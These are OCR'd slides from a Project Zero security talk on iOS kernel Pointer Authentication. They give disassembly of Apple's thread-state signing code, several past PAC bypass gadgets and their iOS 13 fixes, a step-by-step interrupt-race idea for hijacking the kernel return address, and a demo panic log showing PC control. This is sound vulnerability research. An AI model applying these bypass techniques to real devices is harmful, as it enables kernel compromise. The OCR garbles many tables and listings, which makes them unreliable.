# iOS Kernel PAC, One Year Later

Brandon Azad, Google Project Zero

#### **Project Zero**

News and updates from the Project Zero team at Google

#### Friday, February 1, 2019

#### Examining Pointer Authentication on the iPhone XS

#### Posted by Brandon Azad, Project Zero

In this post I examine Apple's implementation of Pointer Authentication on the A12 SoC used in the iPhone XS, with a focus on how Apple has improved over the ARM standard. I then demonstrate a way to use an arbitrary kernel read/write primitive to forge kernel PAC signatures for the A keys, which is sufficient to execute arbitrary code in the kernel using JOP. The technique I discovered was (mostly) fixed in iOS 12.1.3. In fact, this fix first appeared in the 16D5032a beta while my research was still ongoing.

#### ARMv8.3-A Pointer Authentication

Among the most exciting security features introduced with ARMv8.3-A is Pointer Authentication, a feature where the upper bits of a pointer are used to store a Pointer Authentication Code (PAC), which is essentially a cryptographic signature on the pointer value and some additional context. Special instructions have been introduced to add an authentication code to a pointer and to verify an authenticated pointer's PAC and restore the original pointer value. This gives the system a way to make cryptographically strong guarantees about the likelihood that certain pointers have been tampered with by attackers, which offers the possibility of greatly improving application security.

(Proper terminology dictates that the security feature is called Pointer Authentication while the cryptographic signature that is inserted into the unused bits of a pointer is called the Pointer Authentication

#### Search This Blog

Search

#### Pages

- About Project Zero
- Working at Project Zero
- Oday "In the Wild"
- Vulnerability Disclosure FAQ

#### Archives

#### 2020

- How to uncover a 0-day in 4 hours or less (Jul)
- FF Sandbox Escape (CVE-2020-12388) (Jun)
- A survey of recent iOS kernel exploits (Jun)
- Fuzzing ImageIO (Apr)
- You Won't Believe what this One Line Change Did to... (Apr)
- TFW you-get-really-excited-you-patchdiffed-a-0day... (Apr)
- Escaping the Chrome Sandbox with RIDL (Feb)



# A Study in PAC

#### **Brandon Azad**

#### **MOSEC 2019**

## ARMv8.3-A Pointer Authentication

# 0xffffff01e335a5c



# 0xffffff01e335a5c



# 0x2ab4ae701e335a5c



### PAC instructions

| PACIZA X1       Sign pointer in X1 with IA key and context 0                 |   |
|------------------------------------------------------------------------------|---|
|                                                                              |   |
| PACIBSP Sign LR with IB key and context SP                                   |   |
| AUTIA X2, X8 Authenticate signed pointer in X2 with IA key and context X8    | 8 |
| XPACI X3Strip the PAC from the pointer in X3 without validation              |   |
| BLRAA X4, X8 Authenticate X4 with context X8, then branch-with-link          |   |
| LDRAA X9, [X5] Authenticate X5 with context 0, then load 64-bit value into X | 9 |
| <b>RETAB</b> Authenticate LR with IB key and context SP, then return         |   |

# PAC in the iOS 12 kernel

### PAC key use in XNU

| IA | Global code pointer       | Function pointers, vtable methods |
|----|---------------------------|-----------------------------------|
| IB | Thread-local code pointer | Return addresses                  |
| DA | Global data pointer       | Vtable pointers                   |
| DB | Thread-local data pointer | (unused)                          |
| GA | Generic data              | Thread saved state: PC, LR, CPSR  |

#### Virtual method calls



#### Signing saved thread state (kernel & user)

| FFFFFF0079BD090  | ; void   | fastcall sign  | thread state | arm | context *  | state, u | 164 pc, | u64 cr | osr, u6 | 4 lr)  |        |
|------------------|----------|----------------|--------------|-----|------------|----------|---------|--------|---------|--------|--------|
| FFFFFF0079BD090  |          |                |              |     |            | EF: fleh |         |        |         |        |        |
| FFFFFF0079BD090  |          |                |              |     | ; Lel1_sp  | 0_synchr | onous_  | vector | long_i  | mpl_S3 | 4_c15_ |
| FFFFFF0079BD090  |          | PACGA          | x1,          | X1, | xo         |          |         |        |         |        |        |
| FFFFFF0079BD094  |          | AND            | x2,          | X2, | #NOT 0x20  | 000000 ; | Carry   | flag   |         |        |        |
| FFFFFF0079BD098  |          | PACGA          | X1,          | X2, | X1         |          |         |        |         |        |        |
| FFFFFF0079BD09C  |          | PACGA          | <b>x1</b> ,  |     |            |          |         |        |         |        |        |
| FFFFFF0079BD0A0  |          | STR            | x1,          | [X0 | ,#arm_cont | ext.pac_ | sig]    |        |         |        |        |
| FFFFFF0079BD0A4  |          | RET            |              |     |            |          |         |        |         |        |        |
| FFFFFFF0079BD0A4 | ; End of | function sign_ | thread_state |     |            |          |         |        |         |        |        |
| FFFFFF0079BD0A4  |          |                |              |     |            |          |         |        |         |        |        |
|                  |          |                |              |     |            |          |         |        |         |        |        |

#### Verifying thread state signatures

```
FFFFFF0079BD0A8 ; void fastcall verify thread state(arm context *state, u64 pc, u64 cpsr, u64 lr)
FFFFFF0079BD0A8 verify thread state
                                                         ; CODE XREF: exception return+54tp
                                                         ; machine load context+4Ctp ...
FFFFFFF0079BD0A8
FFFFFFF0079BD0A8
                                PACGA
                                                X1, X1, X0
                                                X2, X2, #NOT 0x20000000; Carry flag
FFFFFFF0079BDOAC
                                AND
                                                x1, x2, x1
FFFFFF0079BD0B0
                                PACGA
                                                X1, X3, X1
FFFFFFF0079BD0B4
                                PACGA
                                                X2, [X0, #arm context.pac sig]
FFFFFFF0079BD0B8
                                LDR
FFFFFF0079BD0BC
                                CMP
                                                X1, X2
FFFFFFF0079BD0C0
                                B.NE
                                                loc FFFFFFF0079BD0C8
FFFFFFF0079BD0C4
                                RET
FFFFFFF0079BD0C8
FFFFFFF0079BD0C8
                                                         ; CODE XREF: verify thread state+18 tj
FFFFFF0079BD0C8
               loc FFFFFFF0079BD0C8
FFFFFF0079BD0C8
                                MOV
                                                x1, x0
                                                X0, aJopHashMismatc ; "JOP Hash Mismatch Detected (PC, CI
FFFFFF0079BD0CC
                                ADR
                                                panic with thread kernel state
FFFFFFF0079BD0D0
                                BL
FFFFFF0079BD0D0 ; End of function verify thread state
FFFFFFF0079BD0D0
FFFFFF0079BD0D0
                                                     _____
                aJopHashMismatc DCB "JOP Hash Mismatch Detected (PC, CPSR, or LR corruption)",0
FFFFFF0079BD0D4
FFFFFF0079BD0D4
                                                        ; DATA XREF: verify thread state+24to
FFFFFFF0079BD10C
                                ALIGN 0x20
```

### **Exception return**

|                                         | exception_return                   | ; CODE XREF: return_to_kernel:do_exception_return |
|-----------------------------------------|------------------------------------|---------------------------------------------------|
| FFFFFF0079B3A40                         |                                    | ; user_set_debug_state_and_return+24ij            |
| FFFFFFF0079B3A40                        | MSR #6                             | 5, #0xF ; Disable exceptions                      |
| FFFFFF0079B3A44                         | MRS X3                             | 3, #0, c13, c0, #4 ; TPIDR_EL1                    |
| FFFFFF0079B3A48                         | MOV SE                             | P, X21                                            |
| FFFFFF0079B3A4C                         | LDR XC                             | ), [X3,#thread.machine_cthread_data]              |
| FFFFFF0079B3A50                         |                                    | ), [SP,#arm context.x18]                          |
| FFFFFF0079B3A54                         |                                    |                                                   |
| FFFFFF0079B3A54                         | Lexception return restore register | ; CODE XREF: ppltramp dispatch+BC↓j               |
| FFFFFF0079B3A54                         |                                    | ), [SP,#arm context.pc]                           |
| FFFFFF0079B3A58                         |                                    | , [SP, #arm_context.cpsr]                         |
| FFFFFF0079B3A5C                         |                                    | 2, [SP,#arm_context.fpsr]                         |
| FFFFFF0079B3A60                         |                                    | <pre>B, [SP,#arm_context.fpcr]</pre>              |
| FFFFFF0079B3A64                         |                                    | ), $c4$ , $c0$ , $\#1$ , $x0$ ; ELR EL1           |
| FFFFFF0079B3A68                         |                                    | ), c4, c0, #0, X1 ; SPSR EL1                      |
| FFFFFF0079B3A6C                         |                                    | 3, c4, c4, #1, X2 ; FPSR                          |
| FFFFFF0079B3A70                         |                                    | 3, c4, c4, #0, X3 ; FPCR                          |
| FFFFFF0079B3A74                         |                                    | 19, XO                                            |
| FFFFFF0079B3A78                         |                                    | 20, X1                                            |
| FFFFFF0079B3A7C                         |                                    | 21, X2                                            |
| FFFFFF0079B3A80                         |                                    | 22, X3                                            |
| FFFFFF0079B3A84                         | LDR X3                             | <pre>3, [SP,#arm_context.lr] ; lr</pre>           |
| FFFFFF0079B3A88                         |                                    | 2, W1 ; cpsr                                      |
| FFFFFF0079B3A8C                         |                                    | , X0 ; pc                                         |
| FFFFFF0079B3A90                         |                                    | ), SP ; state                                     |
| FFFFFF0079B3A94                         |                                    | erify_thread_state                                |
| FFFFFF0079B3A98                         |                                    | ), x19                                            |
| 100000000000000000000000000000000000000 | MAT                                | 200                                               |

| FFFFFF0079B3B04 | LDP  | Q12, Q13, [X0, #arm_context.d12]                                  |
|-----------------|------|-------------------------------------------------------------------|
| FFFFFF0079B3B08 | LDP  | Q14, Q15, [X0, #arm context.d14]                                  |
| FFFFFF0079B3B0C | LDP  | Q16, Q17, [X0, #arm context.q16]                                  |
| FFFFFF0079B3B10 | LDP  | Q18, Q19, [X0, #arm context.q18]                                  |
| FFFFFF0079B3B14 | LDP  | Q20, Q21, [X0, #arm context.q20]                                  |
| FFFFFF0079B3B18 | LDP  | $\tilde{Q}22$ , $\tilde{Q}23$ , [X0, #arm context.q22]            |
| FFFFFF0079B3B1C | LDP  | Q24, Q25, [X0, #arm context.q24]                                  |
| FFFFFF0079B3B20 | LDP  | Q26, Q27, [X0, #arm context.q26]                                  |
| FFFFFF0079B3B24 | LDP  | Q28, Q29, [X0, #arm context.q28]                                  |
| FFFFFF0079B3B28 | LDP  | Q30, Q31, [X0, #arm_context.q30]                                  |
| FFFFFF0079B3B2C | LDP  | X2, X3, [X0, #arm context.x2]                                     |
| FFFFFF0079B3B30 | LDP  | X4, X5, [X0, #arm context.x4]                                     |
| FFFFFF0079B3B34 | LDP  | X6, X7, [X0, #arm context.x6]                                     |
| FFFFFF0079B3B38 | LDP  | X8, X9, [X0, #arm context.x8]                                     |
| FFFFFF0079B3B3C | LDP  | X10, X11, [X0, #arm_context.x10]                                  |
| FFFFFF0079B3B40 | LDP  | X12, X13, [X0, #arm context.x12]                                  |
| FFFFFF0079B3B44 | LDP  | X14, X15, [X0, #arm context.x14]                                  |
| FFFFFF0079B3B48 | LDP  | X16, X17, [X0, #arm context.x16]                                  |
| FFFFFF0079B3B4C | LDP  | X18, X19, [X0, #arm context.x18]                                  |
| FFFFFF0079B3B50 | LDP  | X20, X21, [X0, #arm context.x20]                                  |
| FFFFFF0079B3B54 | LDP  | X22, X23, [X0, #arm context.x22]                                  |
| FFFFFF0079B3B58 | LDP  | X24, X25, [X0, #arm context.x24]                                  |
| FFFFFF0079B3B5C | LDP  | X26, X27, [X0, #arm_context.x26]                                  |
| FFFFFF0079B3B60 | LDR  | X28, [X0, #arm context.x28]                                       |
| FFFFFF0079B3B64 | LDP  | X29, X30, [X0, #arm context.x29]                                  |
| FFFFFF0079B3B68 | LDR  | X1, [X0, #arm context.sp]                                         |
| FFFFFF0079B3B6C | MOV  | SP, X1                                                            |
| FFFFFF0079B3B70 | LDP  | X0, X1, [X0, #arm_context.x0]                                     |
| FFFFFF0079B3B74 | ERET | nan kalan (mendik) - Ban ya Bratanaka 💻 anan dalah kalan (1970) - |
|                 |      |                                                                   |

Best ROP gadget ever!



FFFFFF0079B3B74

FFFFFF0079B3B74 ; End of function exception\_return

### **Exception return**

| FFFFFF0079B3A40                         | exception_return                  | ; CODE XREF: return_to_kernel:do_exception_return |
|-----------------------------------------|-----------------------------------|---------------------------------------------------|
| FFFFFF0079B3A40                         |                                   | ; user_set_debug_state_and_return+24↓j            |
| FFFFFF0079B3A40                         | MSR #                             | 6, #0xF ; Disable exceptions                      |
| FFFFFF0079B3A44                         | MRS X                             | 3, #0, c13, c0, #4 ; TPIDR EL1                    |
| FFFFFF0079B3A48                         | MOV S                             | P, X21                                            |
| FFFFFF0079B3A4C                         | LDR X                             | 0, [X3,#thread.machine_cthread_data]              |
| FFFFFF0079B3A50                         |                                   | 0, [SP, #arm context.x18]                         |
| FFFFFF0079B3A54                         |                                   |                                                   |
| FFFFFF0079B3A54                         | Lexception return restore registe | rs ; CODE XREF: ppltramp_dispatch+BC↓j            |
| FFFFFF0079B3A54                         |                                   | 0, [SP, #arm context.pc]                          |
| FFFFFF0079B3A58                         |                                   | 1, [SP, #arm_context.cpsr]                        |
| FFFFFF0079B3A5C                         |                                   | 2, [SP, #arm context.fpsr]                        |
| FFFFFF0079B3A60                         |                                   | 3, [SP, #arm_context.fpcr]                        |
| FFFFFF0079B3A64                         |                                   | $0, c4, c0, \overline{\#}1, X0; ELR EL1$          |
| FFFFFF0079B3A68                         |                                   | 0, c4, c0, #0, X1 ; SPSR_EL1                      |
| FFFFFF0079B3A6C                         |                                   | 3, c4, c4, #1, X2 ; FPSR                          |
| FFFFFF0079B3A70                         |                                   | 3, c4, c4, #0, X3 ; FPCR                          |
| FFFFFF0079B3A74                         |                                   | 19, XO                                            |
| FFFFFF0079B3A78                         |                                   | 20, X1                                            |
| FFFFFF0079B3A7C                         |                                   | 21, X2                                            |
| FFFFFF0079B3A80                         |                                   | 22, 23                                            |
| FFFFFF0079B3A84                         |                                   | 3, [SP,#arm_context.lr] ; lr                      |
| FFFFFF0079B3A88                         |                                   | 2, W1 ; cpsr                                      |
| FFFFFF0079B3A8C                         |                                   | 1, X0 ; pc                                        |
| FFFFFF0079B3A90                         |                                   | 0, SP ; state                                     |
| FFFFFF0079B3A94                         |                                   | erify_thread_state                                |
| FFFFFF0079B3A98                         | WOT                               | 0, x19                                            |
| 000000000000000000000000000000000000000 | 34077 37                          |                                                   |

# iOS 12 PAC bypasses

### iOS 12 kernel PAC bypasses

| PAC signing gadget          | 1 |
|-----------------------------|---|
| PAC bruteforce gadget       | 1 |
| Thread state signing gadget | 2 |
| Unprotected indirect branch | 1 |
| Implementation bug          | 1 |

### A Study in PAC, bypass #1: signing gadget

| • • •  |              |                      |
|--------|--------------|----------------------|
| LDR    | <b>X10</b> , | [ <b>X9</b> ,#0x30]! |
| CBNZ   | X19,         | loc_FFFFFFF007EBD330 |
| CBZ    | <b>x10</b> , | loc_FFFFFFF007EBD330 |
| MOV    | X19,         | #O                   |
| MOV    | X11,         | X9                   |
| MOVK   | X11,         | #0x14EF,LSL#48       |
| AUTIA  | <b>x1</b> 0, | X11                  |
| PACIZA | <b>X10</b>   |                      |
| STR    | <b>x1</b> 0, | [X9]                 |
|        |              |                      |

### A Study in PAC, bypass #1: signing gadget



### A Study in PAC, bypass #2: bruteforce gadget

| LDR    | <b>X10</b> , | [ <b>X9</b> ,#0x30]! |
|--------|--------------|----------------------|
| • • •  |              |                      |
| MOV    | X11,         | X9                   |
| MOVK   | X11,         | #0x14EF,LSL#48       |
| MOV    | X12,         | <b>X10</b>           |
| AUTIA  | x12,         | X11                  |
| XPACI  | <b>X10</b>   |                      |
| CMP    | x12,         | X10                  |
| PACIZA | <b>X10</b>   |                      |
| CSEL   | <b>x1</b> 0, | X10, X12, EQ         |
| STR    | <b>x1</b> 0, | [X9]                 |

### A Study in PAC, bypass #2: bruteforce gadget



### A Study in PAC, bypass #3: state signing gadget

copyio\_error

•••

RETAB

| bcopyin |                             |
|---------|-----------------------------|
| PACIBSP |                             |
| STP     | X29, X30, [SP,#-0x10]!      |
| MOV     | X29, SP                     |
| MRS     | X10, TPIDR_EL1 ;; thread    |
| LDR     | X11, [X10, #thread.recover] |
| ADRL    | X3, copyio_error            |
| STR     | X3, [X10,#thread.recover]   |
|         |                             |

• • •

### A Study in PAC, bypass #3: state signing gadget

| copyio_err | or                         |                  |
|------------|----------------------------|------------------|
|            |                            |                  |
| RETAB      |                            |                  |
| bcopyin    |                            |                  |
| PACIBS     | SP                         |                  |
| STP        | X29, X30, [SP,#-0x10]!     |                  |
| MOV        | X29, SP                    | Unprotected code |
| MRS        | X10, TPIDR_EL1 ;; thread   | pointer used for |
| LDR        | X11, [X10,#thread.recover] | •                |
| ADRL       | X3, copyio_error           | control flow     |
| STR        | x3, [X10 #thread.recover]  |                  |

• • •

### A Study in PAC, bypass #4: unprotected branch

ipc\_kmsg\_clean\_body

| • • • |                                     |
|-------|-------------------------------------|
| ADR   | X25, jpt_FFFFFFF0079CFAF0           |
| • • • |                                     |
| BL    | <pre>ipc_port_release_receive</pre> |
| • • • |                                     |
| CMP   | W9, #3 ; switch 4 cases             |
| B.HI  | def_FFFFFF6079CFAF0                 |
| LDRSW | X9, [X25,X9,LSL#2]                  |
| ADD   | X9, X9, X25                         |
| BR    | X9 ; switch jump                    |
|       |                                     |

### A Study in PAC, bypass #4: unprotected branch



### A Study in PAC, bypass #4: unprotected branch



### A Study in PAC, bypass #5: state signing gadget

```
machine thread create(thread *thread, ...)
ł
    user state = zalloc(user ss zone);
    thread->machine.upcb = user state;
    user state = thread->machine.upcb;
    sign thread state (user state,
        user state->pc,
        user state->cpsr,
        user state->lr);
```

### A Study in PAC, bypass #5: state signing gadget

```
machine thread create(thread *thread, ...)
Ł
    user state = zalloc(user ss zone);
    thread->machine.upcb = user state;
    user state = thread->machine.upcb;
    sign thread state (user state,
        user state->pc,
        user state->cpsr,
        user state->lr);
```

Interrupts are enabled

#### Signing saved thread state (kernel & user)

| FFFFFF0079BD090  | ; void   | fastcall sign  | thread state | arm | context *  | state, u | 164 pc, | u64 cr | osr, u6 | 4 lr)  |        |
|------------------|----------|----------------|--------------|-----|------------|----------|---------|--------|---------|--------|--------|
| FFFFFF0079BD090  |          |                |              |     |            | EF: fleh |         |        |         |        |        |
| FFFFFF0079BD090  |          |                |              |     | ; Lel1_sp  | 0_synchr | onous_  | vector | long_i  | mpl_S3 | 4_c15_ |
| FFFFFF0079BD090  |          | PACGA          | x1,          | X1, | xo         |          |         |        |         | _      |        |
| FFFFFF0079BD094  |          | AND            | x2,          | X2, | #NOT 0x20  | 000000 ; | Carry   | flag   |         |        |        |
| FFFFFF0079BD098  |          | PACGA          | X1,          | X2, | X1         |          |         |        |         |        |        |
| FFFFFF0079BD09C  |          | PACGA          | <b>x1</b> ,  |     |            |          |         |        |         |        |        |
| FFFFFF0079BD0A0  |          | STR            | x1,          | [X0 | ,#arm_cont | ext.pac_ | sig]    |        |         |        |        |
| FFFFFF0079BD0A4  |          | RET            |              |     |            |          |         |        |         |        |        |
| FFFFFFF0079BD0A4 | ; End of | function sign_ | thread_state |     |            |          |         |        |         |        |        |
| FFFFFF0079BD0A4  |          |                |              |     |            |          |         |        |         |        |        |
|                  |          |                |              |     |            |          |         |        |         |        |        |

### A Study in PAC, bypass #5: state signing gadget

```
machine thread create(thread *thread, ...)
Ł
    user state = zalloc(user ss zone);
    thread->machine.upcb = user state;
    user state = thread->machine.upcb;
    sign thread state (user state,
        user state->pc,
        user state->cpsr,
        user state->lr);
```

Interrupts are enabled

### A Study in PAC, bypass #5: state signing gadget

```
machine thread create(thread *thread, ...)
    user state = zalloc(user ss zone);
    thread->machine.upcb = user state;
    user state = thread->machine.upcb;
                                                Parameters to sign
                                                  are read from
    sign thread state(user state,
        user state->pc,
                                                     memory
        user state->cpsr,
        user state->lr);
```

#### Attacking iPhone XS Max bypass: validation bug

jopdetector ; CODE XREF: sub FFFFFFF0079FFA40+541p ; machine load context+4C1p ... PACGA X1, X1, X0 AND X2, X2, #0xFFFFFFFFFFFFFFFF PACGA X1, X2, X1 PACGA X1, X3, X1 LDR  $x_{2}, [x_{0}, \#0x_{128}]$ CMP X1, X2 RET End of function jopdetector 2 MOV X1, X0 X0, aJopHashMismatc ; "JOP Hash Mismatch Detected (PC, CPSR, o"... ADR callPanic BL aJopHashMismatc DCB "JOP Hash Mismatch Detected (PC, CPSR, or LR corruption)",0 ; DATA XREF: text:FFFFFF007A090C81o ALIGN 0x20

#### Attacking iPhone XS Max bypass: validation bug



### Attacking iPhone XS Max bypass: validation bug



iOS 13 changes

# PAC key use in XNU

| IA | Global code pointer       | Function pointers, vtable methods          |
|----|---------------------------|--------------------------------------------|
| IB | Thread-local code pointer | Return addresses                           |
| DA | Global data pointer       | Vtable pointers                            |
| DB | Thread-local data pointer | (unused)                                   |
| GA | Generic data              | Thread saved state: PC, LR, CPSR, X16, X17 |
|    |                           |                                            |

New protected registers —

### Signing saved thread state in iOS 13



X16 and X17 should now be safe from modification during an interrupt

### Hardened switch statements

ipc\_kmsg\_clean\_body

| ADR   | X25, jpt_FFFFFF60079CFAF0 |
|-------|---------------------------|
| •••   |                           |
| • • • |                           |
| CMP   | W9, #3 ; switch 4 cases   |
| B.HI  | def_FFFFFF6079CFAF0       |
| LDRSW | X9, [X25,X9,LSL#2]        |
| ADD   | <b>X9, X9, X25</b>        |
| BR    | X9 ; switch jump          |

#### ipc\_kmsg\_clean\_body

. . .

| •••   |                          |
|-------|--------------------------|
| CMP   | W16, #4 ; switch 5 cases |
| B.HI  | def_FFFFFF607B8F8B0      |
| CMP   | X16, #4                  |
| CSEL  | X16, X16, XZR, LS        |
| ADR   | x17, jpt_FFFFFF007B8F8B0 |
| NOP   |                          |
| LDRSW | X16, [X17,X16,LSL#2]     |
| ADD   | X16, X17, X16            |
| BR    | X16 ; switch jump        |
|       |                          |

Unprotected indirect branches only use X16 and X17

# Analyzing PAC on iOS 13

# A Study in PAC, bypass 5: state signing gadget

```
machine thread create(thread *thread, ...)
Ł
    user state = zalloc(user ss zone);
    thread->machine.upcb = user state;
    user state = thread->machine.upcb;
    sign thread state (user state,
        user state->pc,
        user state->cpsr,
        user state->lr);
```

```
Bypass 5 fix
  machine thread create(thread *thread, ...)
  Ł
      user_state = zalloc(user ss zone);
      thread->machine.upcb = user state;
      user state = thread->machine.upcb;
      sign thread state(user state, 0, 0, 0, 0, 0);
```

```
Bypass 5 fix
  machine thread create(thread *thread, ...)
  ł
                                                     Issue: Interrupts
      user_state = zalloc(user ss zone);
                                                     are still enabled!
      thread->machine.upcb = user state;
      user state = thread->machine.upcb;
      sign thread state(user state, 0, 0, 0, 0, 0);
```

# Bypass 5 fix (assembly)

machine\_thread\_state\_initialize

| • • • |                                      |
|-------|--------------------------------------|
| LDR   | X0, [X19,#thread.upcb] ; arm_context |
| CBZ   | X0, loc_FFFFFF007CD2A34              |
| MOV   | W2, #0 ; cpsr                        |
| MOV   | x1, #0 ; pc Imagine getting an       |
| MOV   | x3, #0 ; 1r interrupt here           |
| MOV   | X4, #0 ; x16                         |
| MOV   | X5, #0 ; x17                         |
| BL    | sign_thread_state                    |

• • •

### Interrupt exceptions

### el1\_sp0\_fiq\_vector\_long

| <br>STP | X0, X1, [SP,#arm_context.x0] |
|---------|------------------------------|
|         | -<br>V1 flab fin             |
| ADRL    | X1, fleh_fiq                 |
| В       | fleh_dispatch64              |

#### fleh\_dispatch64

| STP | X2, X3, | [X0,#arm_context.x2] |
|-----|---------|----------------------|
| STP | X4, X5, | [X0,#arm_context.x4] |
| STP | X6, X7, | [X0,#arm_context.x6] |
| STP | X8, X9, | [X0,#arm_context.x8] |



• • •

### Interrupt exceptions

### el1\_sp0\_fiq\_vector\_long

| • • • |                              |
|-------|------------------------------|
| STP   | X0, X1, [SP,#arm_context.x0] |
| • • • |                              |
| ADRL  | X1, fleh_fiq                 |
| В     | fleh_dispatch64              |

#### fleh\_dispatch64

. . .

| STP | X2, X3, | [X0,#arm_context.x2] |
|-----|---------|----------------------|
| STP | X4, X5, | [X0,#arm_context.x4] |
| STP | X6, X7, | [X0,#arm_context.x6] |
| STP | X8, X9, | [X0,#arm_context.x8] |



### Bypass #6: Interrupts during thread state signing

machine\_thread\_state\_initialize

| • • • |                       |                      |
|-------|-----------------------|----------------------|
| LDR   | X0, [X19,#thread.upcb | ] ; arm_context      |
| CBZ   | X0, loc_FFFFFFF007CD2 | A34                  |
| MOV   | W2, #0 ; cpsr         |                      |
| MOV   | X1, #0 ; pc           | An interrupt here    |
| MOV   | X3, #0 ; lr           | would spill X0-X5,   |
| MOV   | X4, #0 ; x16          | allowing an attacker |
| MOV   | X5, #0 ; x17          |                      |
| BL    | sign_thread_state     | to change the        |
| • • • |                       | parameters being     |
|       |                       | _                    |

signed

# Finding a better interrupt point

```
void thread state64 to saved state(new state, thread state)
    . . .
    new pc = new state->pc;
    x16 = thread state -> x16;
    x17 = thread state \rightarrow x17;
    cpsr = thread state->cpsr;
    lr = thread state->lr;
    verify thread state(thread state, thread state->pc, cpsr,
            lr, x16, x17);
    thread state->pc = new pc;
    sign thread state(thread state, new pc, cpsr,
            lr, x16, x17);
```

### thread\_state64\_to\_saved\_state

| • • • |                                      |
|-------|--------------------------------------|
| MOV   | <b>X8, X30</b>                       |
| MOV   | X0, X9 ; arm_context *               |
| LDP   | X4, X5, [X0, #arm_context.x16] ; x17 |
| LDR   | X6, [X0,#arm_context.pc]             |
| LDR   | W7, [X0,#arm_context.cpsr]           |
| LDR   | X3, [X0,#arm_context.lr] ; lr        |
| MOV   | X1, X6 ; pc                          |
| MOV   | W2, W7 ; cpsr                        |
| BL    | <pre>verify_thread_state</pre>       |
| MOV   | X1, X6                               |
| MOV   | W2, W7 ; cpsr                        |
| MOV   | X1, X11 ; pc                         |
| STR   | X1, [X0,#arm_context.pc]             |
| BL    | sign_thread_state                    |
| MOV   | x30, x8                              |
| •••   |                                      |

RET

### thread\_state64\_to\_saved\_state

| • • • |                                        |                    |
|-------|----------------------------------------|--------------------|
| MOV   | x8, x30                                |                    |
| MOV   | X0, X9 ; arm_context *                 |                    |
| LDP   | X4, X5, $[X0, #arm_context.x16]$ ; x17 |                    |
| LDR   | X6, [X0,#arm_context.pc]               |                    |
| LDR   | W7, [X0,#arm_context.cpsr]             | LR (X30) saved to  |
| LDR   | X3, [X0,#arm_context.lr] ; lr          | ι <i>γ</i>         |
| MOV   | X1, X6 ; pc                            | X8 during function |
| MOV   | W2, W7 ; cpsr                          | calls              |
| BL    | verify_thread_state                    |                    |
| MOV   | x1, x6                                 |                    |
| MOV   | W2, W7; cpsr                           |                    |
| MOV   | X1, X11 ; pc                           |                    |
| STR   | X1, [X0,#arm_context.pc]               |                    |
| BL    | sign_thread_state                      |                    |
| MOV   | x30, x8                                |                    |
| • • • |                                        |                    |

RET

### thread\_state64\_to\_saved\_state

| • • • |                                     |                      |
|-------|-------------------------------------|----------------------|
| MOV   | X8, X30                             |                      |
| MOV   | X0, X9 ; arm_context *              |                      |
| LDP   | X4, X5, [X0,#arm_context.x16] ; x17 |                      |
| LDR   | X6, [X0,#arm_context.pc]            |                      |
| LDR   | W7, [X0,#arm_context.cpsr]          | LR (X30) saved to    |
| LDR   | X3, [X0,#arm_context.lr] ; lr       | <b>\ /</b>           |
| MOV   | X1, X6 ; pc                         | X8 during function   |
| MOV   | W2, W7 ; cpsr                       | calls                |
| BL    | <pre>verify_thread_state</pre>      |                      |
| MOV   | X1, X6                              |                      |
| MOV   | W2, W7; cpsr                        | X8 can be changed    |
| MOV   | X1, X11 ; pc                        | during an interrupt! |
| STR   | X1, [X0, #arm_context.pc]           | 0                    |
| BL    | sign_thread_state                   |                      |
| MOV   | x30, x8                             |                      |
|       |                                     |                      |

... RET

# Bypass #6 idea

- Thread A: Pin to CPU #4 (receives many interrupts)
- Thread B: Pin to CPU #5 (receives few interrupts)
- Thread A: Loop on thread\_set\_state()
- Thread B: Monitor CPU #4's cpu\_data for an interrupt
- Thread A: Gets interrupted just before "MOV X30, X8"
- Thread B: Overwrite CPU #4's saved X8 register value
- Thread A: Returns from interrupt handler, resumes at "MOV X30, X8"
- Thread A: Executes "RET", jumps to arbitrary PC















































#### DEMO

<

#### panic-full-2020-02-17-132114....

רוק

"build" : "iPhone OS 13.3 (17C54)", "product" : "iPhone12,3", "kernel" : "Darwin Kernel Version 19.2.0: Mon Nov 4 17:46:45 PST 2019; root:xnu-6153.60.66~39\/RELEASE ARM64 T8030". "incident" : "30E07616-66A8-425C-8D40-4B570531CDF5", "crashReporterKey" : "bc51922c773e3ee642f1e730544045c6bd181e49", "date" : "2020-02-17 13:21:12.40 -0800", "panicString" : "panic(cpu 0 caller 0xffffff01afa36dc): PC alignment exception from kernel. at pc 0xffffff041414141, lr 0xffffff042424242 (saved state: 0xffffffe07e777cb0)\n\t x0: 0x000000000000000 x1: 0x0001000100010001 x2: 0x0002000200020002 x3: 0x0003000300030003\n\t x4: 0x0004000400040004 x5: 0x0005000500050005 x6: 0x0006000600060006 x7: 0x0007000700070007\n\t x8: 0x0008000800080008 x9: 0x0009000900090009 x10: 0x0010001000100010 x11: 0x0011001100110011\n\t x12: 0x0012001200120012 x13: 0x0013001300130013 x14: 0x0014001400140014 x15: 0x0015001500150015\n\t x16: 0x0016001600160016 x17: 0x0017001700170017 x18: 0x000000000000000 x19: 0x0019001900190019\n\t x20: 0x0020002000200020 x21: 0x0021002100210021 x22: 0x0022002200220022 x23: 0x0023002300230023\n\t x24: 0x0024002400240024 x25: 0x0025002500250025 x26: 0x0026002600260026 x27: 0x0027002700270027\n\t x28: 0x0028002800280028 fp: 0x0029002900290029 lr: 0xffffff042424242 sp: 0xffffffe07e778000\n\t pc: 0xffffff041414141cpsr: 0x20400304 far: 0xffffff041414141\n\nDebugger message: esr: 0x8a000000 panic\nMemory ID: 0x6\nOS version: 17C54\nKernel version: Darwin Kernel Version 19.2.0: Mon Nov 4 17:46:45 PST 2019; root:xnu-6153.60.66~39\/ RELEASE\_ARM64\_T8030\nKernel UUID: 25C048C5-E304-3E2E-BC84-6DF0B4E21F63\niBoot version: iBoot-5540.60.11\nsecure boot?: YES\nPaniclog version: 13\nKernel slide: 0x000000012ddc000\nKernel

| 🕨 🥢 oob_timestamp 🔪 bazac                                                                                                                                                                                                  | d-p0-iphone12,3                                                                                                                                      | pac_bypass_6   Build oob_timestamp: Succeeded   Today at 16:07 +                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           |                                        |
|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------|
